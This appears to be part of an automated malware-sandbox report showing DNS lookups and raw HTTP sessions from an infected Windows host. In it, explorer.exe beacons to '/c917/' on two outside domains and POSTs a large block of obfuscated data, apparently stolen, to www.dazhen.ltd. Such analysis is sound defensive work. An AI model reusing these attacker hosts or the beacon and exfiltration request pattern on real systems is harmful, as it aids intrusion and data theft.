May 6, 2019 21:25:56.163670063 CEST	8.8.8.8	192.168.1.22	0xa16	No error (0)	www.dazhen.ltd.w.kunlunsl.com		47.246.2.227	A (IP address)	IN (0x0001)
May 6, 2019 21:25:56.163670063 CEST	8.8.8.8	192.168.1.22	0xa16	No error (0)	www.dazhen.ltd.w.kunlunsl.com		47.246.2.228	A (IP address)	IN (0x0001)
May 6, 2019 21:25:56.163670063 CEST	8.8.8.8	192.168.1.22	0xa16	No error (0)	www.dazhen.ltd.w.kunlunsl.com		47.246.2.225	A (IP address)	IN (0x0001)
May 6, 2019 21:25:56.163670063 CEST	8.8.8.8	192.168.1.22	0xa16	No error (0)	www.dazhen.ltd.w.kunlunsl.com		47.246.2.229	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.shakeitmiami.com

www.dazhen.ltd

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.22	49243	208.91.197.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 6, 2019 21:25:10.045095921 CEST	21	OUT	GET /c917/?oHl4Lb5=nSCEaBLXfhTJ/xBIM1eG5VjHdYjSCo5E7UcE1As1Jcfg6SQ1mrA8W1jO4t4mCZy3/NbUbQ==&uFF4=XROl_rtXM HTTP/1.1 Host: www.shakeitmiami.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
May 6, 2019 21:25:10.258433104 CEST	22	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2019 19:25:10 GMT Server: Apache Set-Cookie: vsid=931vr3047163101715501; expires=Sat, 04-May-2024 19:25:10 GMT; Max-Age=157680000; path=/; domain=www.shakeitmiami.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_EbvMjyOdug5Me0TOkeTJF4buuWK3AgKQLx7avWgdE0a+fqJkep5R2+wzCUmevS1fhv71Dy1yAlcjTbMQxer15A== Content-Length: 2686 Keep-Alive: timeout=5, max=128 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 61 6b 65 69 74 6d 69 61 6d 69 2e 63 6f 6d 2f 3f 66 70 3d 59 74 58 78 50 44 78 32 39 75 71 25 32 42 75 58 45 53 71 38 6f 59 43 57 47 6d 47 4e 6c 71 36 55 68 69 54 36 57 6e 78 56 35 41 63 6c 6b 4f 25 32 46 6b 79 48 49 36 6b 6e 49 4c 68 67 36 74 78 59 49 33 42 6a 66 51 37 69 66 4c 32 6a 63 39 65 51 4e 70 65 52 33 55 25 32 46 48 41 67 71 70 6f 48 53 47 53 62 76 73 70 25 32 42 73 65 6d 78 76 77 48 61 57 31 4e 64 76 37 30 78 4c 59 45 77 46 7a 4d 64 51 4c 76 64 57 75 4f 76 25 32 42 4a 64 31 75 6c 32 54 61 52 31 51 67 6d 25 32 46 56 30 31 38 50 45 72 50 74 72 72 46 53 66 43 44 30 30 42 70 33 45 42 36 49 77 25 33 44 26 70 72 76 74 6f 66 3d 74 6f 56 39 66 65 64 71 58 46 4e 45 25 32 46 48 49 56 35 4a 75 32 35 73 5a 61 46 6a 54 37 39 34 7a 78 42 76 35 71 4c 75 62 59 66 58 4d 25 33 44 26 70 6f 72 75 3d 42 5a 6c 50 64 54 64 34 67 76 6f 37 44 41 4e 51 54 45 6e 64 4f 51 59 51 37 6b 48 44 56 73 38 70 53 69 62 55 47 6e 57 65 69 51 54 72 39 41 52 73 79 78 45 6c 69 4f 5a 79 5a 63 4f 7a 46 59 37 78 61 4e 46 6a 35 52 63 37 46 6c 76 64 79 44 35 51 76 48 49 4f 64 6a Data Ascii: ...top.location="http://www.shakeitmiami.com/?fp=YtXxPDx29uq%2BuXESq8oYCWGmGNlq6UhiT6WnxV5AclkO%2FkyHI6knILhg6txYI3BjfQ7ifL2jc9eQNpeR3U%2FHAgqpoHSGSbvsp%2BsemxvwHaW1Ndv70xLYEwFzMdQLvdWuOv%2BJd1ul2TaR1Qgm%2FV018PErPtrrFSfCD00Bp3EB6Iw%3D&prvtof=toV9fedqXFNE%2FHIV5Ju25sZaFjT794zxBv5qLubYfXM%3D&poru=BZlPdTd4gvo7DANQTEndOQYQ7kHDVs8pSibUGnWeiQTr9ARsyxEliOZyZcOzFY7xaNFj5Rc7FlvdyD5QvHIOdj
May 6, 2019 21:25:10.258460999 CEST	23	IN	Data Raw: 4b 54 42 53 53 4e 25 32 46 63 31 70 39 45 32 67 44 71 47 5a 4b 25 32 46 47 4d 42 51 5a 59 59 38 6f 68 38 4b 31 74 25 32 42 30 68 4d 25 32 42 33 69 4f 25 32 42 59 52 6b 61 4c 70 30 36 4c 6b 52 6b 37 4b 68 77 4b 6c 70 4e 50 72 6c 63 4c 4a 70 59 41 Data Ascii: KTBSSN%2Fc1p9E2gDqGZK%2FGMBQZYY8oh8K1t%2B0hM%2B3iO%2BYRkaLp06LkRk7KhwKlpNPrlcLJpYAIifqObiuy89FwfSHXyPFtqHTXO2%2FQIjOtYMHE94WZIoP2gk5OI72WtbA%3D%3D&cifr=1&oHl4Lb5=nSCEaBLXfhTJ%2FxBIM1eG5VjHdYjSCo5E7UcE1As1Jcfg6SQ1mrA8W1jO4t4mCZy3%2FNbUbQ%3D%3D&
May 6, 2019 21:25:10.258491993 CEST	24	IN	Data Raw: 75 71 25 32 42 75 58 45 53 71 38 6f 59 43 57 47 6d 47 4e 6c 71 36 55 68 69 54 36 57 6e 78 56 35 41 63 6c 6b 4f 25 32 46 6b 79 48 49 36 6b 6e 49 4c 68 67 36 74 78 59 49 33 42 6a 66 51 37 69 66 4c 32 6a 63 39 65 51 4e 70 65 52 33 55 25 32 46 48 41 Data Ascii: uq%2BuXESq8oYCWGmGNlq6UhiT6WnxV5AclkO%2FkyHI6knILhg6txYI3BjfQ7ifL2jc9eQNpeR3U%2FHAgqpoHSGSbvsp%2BsemxvwHaW1Ndv70xLYEwFzMdQLvdWuOv%2BJd1ul2TaR1Qgm%2FV018PErPtrrFSfCD00Bp3EB6Iw%3D&prvtof=j5nNDKScmmBjNv3HKfRL8%2FUO2%2FAiu32DWY9xz%2BmzfRE%3D&poru=
May 6, 2019 21:25:10.258522034 CEST	25	IN	Data Raw: 6f 65 62 6e 32 71 57 59 38 42 52 75 4d 55 64 6a 79 68 58 59 61 44 66 5a 59 44 46 54 39 47 33 56 44 6a 6e 79 52 25 32 46 45 6d 37 50 39 4c 63 46 64 45 55 50 39 36 73 59 45 34 64 52 75 52 72 56 41 70 56 67 6a 33 61 4f 63 32 53 39 30 56 65 62 5a 56 Data Ascii: oebn2qWY8BRuMUdjyhXYaDfZYDFT9G3VDjnyR%2FEm7P9LcFdEUP96sYE4dRuRrVApVgj3aOc2S90VebZVQWZ03XsDpM8ynlSl8eOTcqrb1QGpKXElDofKS1HRz2AcQP%2FN5vIdQu8ylFDikV2ttCKrKPCkZjfOIAgJETJDpYV29pj%2FfXJ4i4eFP7PBWllFkCEQ0KJDkhlg%3D%3D&oHl4Lb5=nSCEaBLXfhTJ%2FxBIM1eG
May 6, 2019 21:25:10.270538092 CEST	25	IN	Data Raw: 6f 65 62 6e 32 71 57 59 38 42 52 75 4d 55 64 6a 79 68 58 59 61 44 66 5a 59 44 46 54 39 47 33 56 44 6a 6e 79 52 25 32 46 45 6d 37 50 39 4c 63 46 64 45 55 50 39 36 73 59 45 34 64 52 75 52 72 56 41 70 56 67 6a 33 61 4f 63 32 53 39 30 56 65 62 5a 56 Data Ascii: oebn2qWY8BRuMUdjyhXYaDfZYDFT9G3VDjnyR%2FEm7P9LcFdEUP96sYE4dRuRrVApVgj3aOc2S90VebZVQWZ03XsDpM8ynlSl8eOTcqrb1QGpKXElDofKS1HRz2AcQP%2FN5vIdQu8ylFDikV2ttCKrKPCkZjfOIAgJETJDpYV29pj%2FfXJ4i4eFP7PBWllFkCEQ0KJDkhlg%3D%3D&oHl4Lb5=nSCEaBLXfhTJ%2FxBIM1eG

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.1.22	49244	47.246.2.232	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 6, 2019 21:25:56.219759941 CEST	26	OUT	GET /c917/?oHl4Lb5=iGVqKJabq6qQQGosgk35PP7J8LpIY7g2/xqRC4FpH3ix1hS6w0nKWvUQXf0Fn5J++7YKhg==&uFF4=XROl_rtXM&sql=1 HTTP/1.1 Host: www.dazhen.ltd Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
May 6, 2019 21:25:57.170886040 CEST	28	IN	HTTP/1.1 404 Not Found Server: Tengine Content-Type: text/html; charset=utf-8 Content-Length: 1864 Connection: close Date: Mon, 06 May 2019 19:25:56 GMT Vary: Accept-Encoding Cache-Control: private Set-Cookie: ASP.NET_SessionId=cvf30oid01f3tnzktbph5mu3; path=/; HttpOnly X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Ali-Swift-Global-Savetime: 1557170756 Via: cache24.l2hk71[24,404-1280,M], cache1.l2hk71[25,0], cache18.ru3[701,404-1280,M], cache6.ru3[895,0] X-Swift-Error: orig response 4XX error X-Cache: MISS TCP_MISS dirn:-2:-2 X-Swift-SaveTime: Mon, 06 May 2019 19:25:57 GMT X-Swift-CacheTime: 0 X-Swift-Error: orig response 4XX error Timing-Allow-Origin: * EagleId: 2ff6029a15571707562454862e Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 79 65 73 27 20 6e 61 6d 65 3d 27 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 27 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 62 6c 61 63 6b 27 20 6e 61 6d 65 3d 27 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 27 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 27 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 09 Data Ascii: <!DOCTYPE html><html><head> <meta charset='utf-8'> <meta name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1,minimum-scale=1,user-scalable=no'> <meta content='yes' name='apple-mobile-web-app-capable' /> <meta content='black' name='apple-mobile-web-app-status-bar-style' /> <meta content='telephone=no' name='format-detection' /> <meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'> <title>404</title>
May 6, 2019 21:25:57.170972109 CEST	28	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 09 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b Data Ascii: <script>window.onload=function(){
May 6, 2019 21:25:57.171016932 CEST	29	IN	Data Raw: 0d 0a 09 76 61 72 20 73 70 61 6e 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 70 61 6e 43 6c 6f 63 6b 27 29 3b 20 76 61 72 20 63 6f 75 6e 74 3d 34 3b 0d 0a 77 69 6e 64 6f 77 2e 73 65 74 49 6e 74 65 72 76 61 Data Ascii: var span= document.getElementById('spanClock'); var count=4;window.setInterval(function(){ span.innerHTML=count; if(count==0){window.location.href='/';} count--;},1000)}</script> <link type='text/css' rel='styleshee
May 6, 2019 21:25:57.171049118 CEST	29	IN	Data Raw: 69 76 20 63 6c 61 73 73 3d 27 65 72 72 6f 72 69 6e 2d 62 6f 74 74 6f 6d 27 3e 3c 69 6d 67 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 6e 77 7a 69 6d 67 2e 77 65 7a 68 61 6e 2e 63 6e 2f 43 6f 6e 74 65 6e 74 2f 55 6e 75 73 75 61 6c 2f 69 6d 61 67 65 Data Ascii: iv class='errorin-bottom'><img src='https://nwzimg.wezhan.cn/Content/Unusual/images/404-2.png'></div> </div> </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.1.22	49245	47.246.2.232	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 6, 2019 21:25:59.238399982 CEST	32	OUT	POST /c917/ HTTP/1.1 Host: www.dazhen.ltd Connection: close Content-Length: 104865 Cache-Control: no-cache Origin: http://www.dazhen.ltd User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.dazhen.ltd/c917/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6f 48 6c 34 4c 62 35 3d 71 6b 5a 51 55 73 58 75 79 5a 79 66 42 69 5a 33 77 55 69 6d 56 4a 58 5a 39 71 64 4c 59 34 6f 56 6f 55 54 69 50 70 70 63 54 47 79 51 28 42 47 54 6e 6b 48 66 44 64 6f 64 4a 6f 41 68 69 75 63 4d 7a 6f 41 74 37 64 65 55 50 6c 35 75 50 45 4c 4f 30 50 4c 6c 63 78 66 73 46 61 47 4b 6f 47 35 43 6c 33 45 47 42 6e 31 53 43 6e 79 59 59 35 41 66 49 74 33 58 54 4d 71 46 4c 43 4c 54 54 38 44 79 56 78 7e 65 71 45 70 6e 6b 71 4f 73 75 41 47 79 49 76 62 55 4a 48 4a 45 77 6f 7e 48 44 46 44 57 6f 6d 7e 4a 48 44 28 5f 6b 32 72 52 37 50 55 38 31 71 54 44 77 38 42 4c 7a 69 6f 55 44 72 74 74 48 46 78 5f 4c 68 51 58 59 78 64 44 53 54 63 53 74 42 6f 61 59 4f 7e 61 73 53 57 37 33 58 35 50 58 79 6d 41 4e 64 37 30 48 43 6d 4d 34 63 6b 45 66 33 66 51 50 79 47 55 43 54 79 4e 39 78 39 2d 4e 63 59 6c 6a 51 4a 56 4f 6f 55 64 6e 34 67 48 54 63 46 79 4a 51 39 45 58 65 5a 52 6d 51 7a 58 57 6b 50 75 79 2d 68 4f 75 6c 30 39 4b 30 4b 4b 77 67 47 76 78 2d 74 71 75 77 71 61 63 42 6f 58 68 79 47 6a 57 7a 50 45 75 4e 6f 51 30 65 4d 41 42 71 46 37 77 78 46 38 50 71 48 31 4a 45 44 37 71 6b 38 4c 4d 50 70 76 4a 46 53 36 77 64 4c 55 49 50 45 39 65 61 62 6f 72 72 75 72 54 32 70 41 48 6c 42 37 6b 5f 42 6a 6f 30 57 66 4b 5f 45 46 62 71 31 5a 75 48 65 53 6c 75 56 66 7e 53 62 77 61 59 59 77 33 6f 6c 6e 65 66 46 5f 7a 44 59 5f 61 41 33 4a 41 59 64 6e 4d 69 78 36 75 30 75 34 75 52 32 4f 28 4a 7a 34 35 41 6c 76 4c 57 48 79 4e 45 41 33 48 50 76 33 33 34 49 4e 79 62 49 65 55 79 56 51 6b 59 42 57 76 38 78 43 54 75 63 61 69 37 4f 63 71 62 62 34 76 67 6f 61 67 61 44 5a 47 65 36 57 56 4d 72 48 53 58 46 36 49 4a 6f 4e 56 6c 57 41 56 4d 5a 34 49 72 53 4a 66 61 49 44 49 67 36 32 71 75 70 34 5a 54 79 57 74 45 6e 4f 6a 4e 64 33 70 63 32 7a 30 5f 4a 52 39 72 4a 43 7e 75 47 47 72 59 56 77 4a 4c 6a 57 4f 65 77 6f 6b 51 4e 67 6d 4c 52 79 72 78 44 38 30 62 53 2d 64 6b 51 6a 32 4a 52 4d 68 42 6a 4c 5a 42 61 44 68 4f 30 56 4a 4e 28 5f 54 6b 72 58 62 62 46 5a 7e 74 43 79 56 37 51 38 47 45 36 66 55 68 4f 36 4a 6f 37 6b 66 49 58 55 61 68 4b 4d 74 74 50 2d 33 74 6c 42 73 77 6f 67 43 51 45 37 52 34 70 6d 53 47 67 61 4a 56 4f 36 6f 49 59 30 72 33 49 57 63 45 6b 52 7a 2d 56 51 6f 6c 49 6f 54 75 58 38 30 7a 39 57 50 7a 57 6c 6c 6f 4b 66 63 75 4d 49 62 4f 43 53 32 79 56 31 59 4f 58 62 32 77 53 48 37 5f 50 68 32 64 45 58 4d 7a 4d 2d 52 4b 4d 67 32 34 4a 44 68 65 68 56 78 35 7e 75 4d 70 30 51 72 72 56 42 79 30 30 53 52 4e 7a 75 36 57 75 54 69 64 31 54 30 59 53 47 51 75 70 50 57 36 48 7a 52 36 62 61 4e 43 76 4b 36 71 47 32 32 6c 77 61 5a 4b 58 41 31 75 56 52 41 75 54 64 39 76 66 44 59 6f 51 7a 49 44 44 47 58 4e 6f 34 43 7a 62 32 65 72 73 79 61 66 43 66 46 59 61 57 7a 47 4c 59 44 33 5a 51 63 30 41 70 4d 54 45 59 34 54 4e 65 72 61 63 67 65 6b 6e 6f 44 50 57 36 67 57 4b 64 71 32 72 52 6d 48 52 39 4f 4f 35 58 67 30 68 51 4c 6b 73 67 73 49 6a 79 31 57 33 50 71 43 4c 42 65 5f 47 38 4a 31 48 74 59 55 72 6d 50 31 58 54 46 67 39 6a 61 5a 6d 69 73 4f 6d 5a 61 33 79 6b 62 72 53 52 54 54 53 74 64 65 57 48 70 33 58 61 75 61 46 67 73 6d 4f 63 4a 64 31 35 4d 31 58 2d 75 41 55 64 73 4d 4b 53 67 43 50 69 5a 57 51 59 34 74 73 2d 5a 52 68 42 6d 69 55 48 32 71 78 76 69 6f 4a 77 39 45 7e 45 77 32 4b 51 65 31 55 47 34 72 59 32 67 75 45 6b 32 49 72 4b 63 79 31 45 58 42 4b 53 73 76 36 50 78 49 66 31 68 66 42 74 6a 71 6a 57 6e 5a 44 72 71 73 48 43 79 51 54 4c 53 31 79 38 7a 50 55 34 4f 77 77 49 4a 47 35 47 75 45 4a 4e 41 35 62 69 34 57 32 41 72 61 43 79 36 55 53 5a 58 44 4f 41 32 33 67 5a 36 31 71 76 76 36 6a 32 4f 4b 66 31 46 76 33 4b 47 73 4c 31 44 52 63 53 44 5f 31 34 34 61 7a 63 42 74 69 42 4e 34 5a 44 47 32 30 75 6c 42 53 4d 38 72 31 42 68 41 49 44 4a 38 34 63 68 59 70 47 78 50 6b 6e 6e 75 63 71 59 6e 4f 4e 46 56 6f 34 44 38 79 41 48 38 46 51 72 4f 50 6f 55 56 33 30 74 38 72 44 57 58 79 7a 50 61 33 70 58 46 47 4b 33 4e 69 2d 34 67 4a 79 71 2d 61 65 4c 4b 63 79 36 35 61 41 54 6f 51 44 36 46 76 39 4d 63 4e 4e 6a 71 31 39 33 52 78 4c 55 76 7e 37 75 74 59 6c 32 41 6c 71 75 7a 59 65 66 54 42 31 28 35 45 62 4b 71 70 53 62 59 34 73 50 4a 7a 6a 7e 71 5a 70 75 62 74 47 78 73 50 4c 33 67 77 5a 46 63 75 47 44 57 78 77 67 46 46 77 36 47 6a 74 70 7a 76 43 66 53 32 45 71 4d 56 64 73 6a 42 66 64 44 78 4c 41 33 76 5a 70 6b 38 50 6a 58 79 4b 42 34 79 68 53 62 73 61 33 32 4a 51 53 75 57 57 39 44 4d 6f 51 31 42 4d 56 4e 35 52 30 36 74 50 78 44 72 36 6b 34 35 2d 33 47 58 58 30 38 4b 42 51 56 44 30 35 4b 36 72 48 34 32 67 6e 71 51 79 55 72 51 68 61 6a 66 6b 64 7a 66 65 28 58 72 5a 6a 66 31 6e 79 58 61 4b 34 62 50 39 4f 49 78 43 71 53 54 67 66 63 62 58 69 6b 54 49 51 38 65 7a 4f 43 6e 47 7e 78 64 47 67 30 35 49 36 4e 33 41 67 4d 30 4b 48 43 59 6e 71 71 50 46 59 30 50 61 6e 2d 37 45 65 49 70 42 65 71 51 51 38 49 67 79 68 67 5a 4c 4e 68 41 57 58 63 4a 54 62 42 43 75 35 45 42 6d 6e 70 56 64 37 70 45 2d 45 51 57 35 62 59 37 41 57 62 38 6f 65 76 5a 6e 4d 34 71 6b 70 73 48 72 37 63 6d 71 41 4e 62 72 51 64 61 79 54 49 47 64 74 74 41 69 32 38 33 61 64 73 43 31 53 62 7e 79 47 39 78 4e 59 46 49 31 49 39 45 36 54 44 42 34 68 69 34 57 74 33 74 52 57 39 6f 31 31 2d 49 76 68 47 57 62 4f 36 6b 52 66 7a 71 31 4f 61 39 75 4c 35 54 32 77 36 4a 57 44 77 33 5f 50 67 73 6b 61 5f 66 6b 4e 32 37 69 65 36 4b 36 34 44 65 33 71 52 28 33 70 5a 36 56 4e 4a 75 69 4d 56 56 33 63 59 39 43 65 63 78 67 64 31 48 38 70 51 46 2d 66 73 63 67 65 57 61 4f 7e 63 7e 78 31 47 66 46 61 72 36 7a 4c 37 54 48 47 44 36 31 4c 5f 69 71 6e 51 74 68 6a 51 52 6f 76 61 54 49 6d 53 36 44 7e 54 45 72 53 6d 64 66 33 5a 57 4f 47 64 61 79 63 41 35 66 46 35 28 33 71 59 6a 46 4b 68 6e 62 4f 33 45 4b 59 7a 4b 41 30 59 63 53 39 54 6d 57 72 58 49 39 61 54 38 5a 61 6f 47 64 31 6e 52 6e 57 4a 75 42 58 36 6d 57 69 56 30 59 70 50 45 71 57 66 41 6e 45 65 6f 6d 76 7a 47 6d 6b 58 4a 6d 7a 65 64 30 33 41 75 66 67 4a 53 78 42 66 4d 6c 6b 4d 77 44 64 69 54 57 56 6a 4f 68 42 4d 4b 33 6e 5f 49 47 4d 50 31 48 74 2d 59 49 57 42 4b 79 6d 4e 73 33 65 37 55 33 46 68 72 59 68 4c 37 52 47 6a 77 43 33 47 70 43 48 78 4c 66 52 42 33 5f 54 35 50 7a 35 52 67 5f 6d 72 28 50 58 56 42 33 6a 39 78 41 39 6b 71 71 54 58 28 79 32 51 76 61 31 75 66 5a 51 7a 6b 48 31 6c Data Ascii: oHl4Lb5=qkZQUsXuyZyfBiZ3wUimVJXZ9qdLY4oVoUTiPppcTGyQ(BGTnkHfDdodJoAhiucMzoAt7deUPl5uPELO0PLlcxfsFaGKoG5Cl3EGBn1SCnyYY5AfIt3XTMqFLCLTT8DyVx~eqEpnkqOsuAGyIvbUJHJEwo~HDFDWom~JHD(_k2rR7PU81qTDw8BLzioUDrttHFx_LhQXYxdDSTcStBoaYO~asSW73X5PXymANd70HCmM4ckEf3fQPyGUCTyN9x9-NcYljQJVOoUdn4gHTcFyJQ9EXeZRmQzXWkPuy-hOul09K0KKwgGvx-tquwqacBoXhyGjWzPEuNoQ0eMABqF7wxF8PqH1JED7qk8LMPpvJFS6wdLUIPE9eaborrurT2pAHlB7k_Bjo0WfK_EFbq1ZuHeSluVf~SbwaYYw3olnefF_zDY_aA3JAYdnMix6u0u4uR2O(Jz45AlvLWHyNEA3HPv334INybIeUyVQkYBWv8xCTucai7Ocqbb4vgoagaDZGe6WVMrHSXF6IJoNVlWAVMZ4IrSJfaIDIg62qup4ZTyWtEnOjNd3pc2z0_JR9rJC~uGGrYVwJLjWOewokQNgmLRyrxD80bS-dkQj2JRMhBjLZBaDhO0VJN(_TkrXbbFZ~tCyV7Q8GE6fUhO6Jo7kfIXUahKMttP-3tlBswogCQE7R4pmSGgaJVO6oIY0r3IWcEkRz-VQolIoTuX80z9WPzWlloKfcuMIbOCS2yV1YOXb2wSH7_Ph2dEXMzM-RKMg24JDhehVx5~uMp0QrrVBy00SRNzu6WuTid1T0YSGQupPW6HzR6baNCvK6qG22lwaZKXA1uVRAuTd9vfDYoQzIDDGXNo4Czb2ersyafCfFYaWzGLYD3ZQc0ApMTEY4TNeracgeknoDPW6gWKdq2rRmHR9OO5Xg0hQLksgsIjy1W3PqCLBe_G8J1HtYUrmP1XTFg9jaZmisOmZa3ykbrSRTTStdeWHp3XauaFgsmOcJd15M1X-uAUdsMKSgCPiZWQY4ts-ZRhBmiUH2qxvioJw9E~Ew2KQe1UG4rY2guEk2IrKcy1EXBKSsv6PxIf1hfBtjqjWnZDrqsHCyQTLS1y8zPU4OwwIJG5GuEJNA5bi4W2AraCy6USZXDOA23gZ61qvv6j2OKf1Fv3KGsL1DRcSD_144azcBtiBN4ZDG20ulBSM8r1BhAIDJ84chYpGxPknnucqYnONFVo4D8yAH8FQrOPoUV30t8rDWXyzPa3pXFGK3Ni-4gJyq-aeLKcy65aAToQD6Fv9McNNjq193RxLUv~7utYl2AlquzYefTB1(5EbKqpSbY4sPJzj~qZpubtGxsPL3gwZFcuGDWxwgFFw6GjtpzvCfS2EqMVdsjBfdDxLA3vZpk8PjXyKB4yhSbsa32JQSuWW9DMoQ1BMVN5R06tPxDr6k45-3GXX08KBQVD05K6rH42gnqQyUrQhajfkdzfe(XrZjf1nyXaK4bP9OIxCqSTgfcbXikTIQ8ezOCnG~xdGg05I6N3AgM0KHCYnqqPFY0Pan-7EeIpBeqQQ8IgyhgZLNhAWXcJTbBCu5EBmnpVd7pE-EQW5bY7AWb8oevZnM4qkpsHr7cmqANbrQdayTIGdttAi283adsC1Sb~yG9xNYFI1I9E6TDB4hi4Wt3tRW9o11-IvhGWbO6kRfzq1Oa9uL5T2w6JWDw3_Pgska_fkN27ie6K64De3qR(3pZ6VNJuiMVV3cY9Cecxgd1H8pQF-fscgeWaO~c~x1GfFar6zL7THGD61L_iqnQthjQRovaTImS6D~TErSmdf3ZWOGdaycA5fF5(3qYjFKhnbO3EKYzKA0YcS9TmWrXI9aT8ZaoGd1nRnWJuBX6mWiV0YpPEqWfAnEeomvzGmkXJmzed03AufgJSxBfMlkMwDdiTWVjOhBMK3n_IGMP1Ht-YIWBKymNs3e7U3FhrYhL7RGjwC3GpCHxLfRB3_T5Pz5Rg_mr(PXVB3j9xA9kqqTX(y2Qva1ufZQzkH1l
May 6, 2019 21:25:59.293603897 CEST	37	OUT	Data Raw: 66 62 62 5a 47 31 58 57 43 62 75 52 6a 67 74 37 33 48 71 78 66 79 65 64 4a 5f 62 58 30 76 52 32 58 31 76 70 74 5f 62 6a 54 52 33 37 56 52 56 31 45 74 75 47 6f 59 7e 51 72 6b 28 39 32 48 28 59 79 6f 56 61 55 78 72 70 75 41 59 62 66 6a 6b 59 45 67 Data Ascii: fbbZG1XWCbuRjgt73HqxfyedJ_bX0vR2X1vpt_bjTR37VRV1EtuGoY~Qrk(92H(YyoVaUxrpuAYbfjkYEgR_WBatHhtxPRZQQB5gv8h8GT4ISf8gOpjRQzUlbIkbkiz6Mp6Y75efrdfSnZWVvik4nqS1KoyGa_r15FpsuRycrgdPL0imHksuqXYqDvI5wPPCAcwGF1baQjO4rXwLIdsS4aaUGg3Qtz1ULosa5R8V3S5w0e5KbjD
May 6, 2019 21:25:59.348872900 CEST	46	OUT	Data Raw: 32 52 7e 46 39 79 6c 75 56 43 52 51 56 73 69 4f 45 56 43 74 52 4b 64 6a 4b 58 54 66 61 6e 6c 4f 75 52 5a 7a 69 42 65 53 30 56 57 54 69 61 71 4b 32 65 37 66 33 47 36 37 38 6e 44 36 62 39 71 69 59 51 6e 6a 36 6b 6d 46 34 33 36 32 79 69 61 64 79 6b Data Ascii: 2R~F9yluVCRQVsiOEVCtRKdjKXTfanlOuRZziBeS0VWTiaqK2e7f3G678nD6b9qiYQnj6kmF4362yiadykHnJ1DG4PDoQhvndvFKKDCRZyaq3p~UDKkWYyyUqrzg5V9zLVZIFNMDjqYLJVRLPVZ4D_V3orHVlbgAGM4IZCkkSerqcbqPcWtFs-60g8EN7iu6iXiHn7T4ASUsI2B2(mz1fvVYV3bKD24J90YBGtBhN4dBtf3kecI
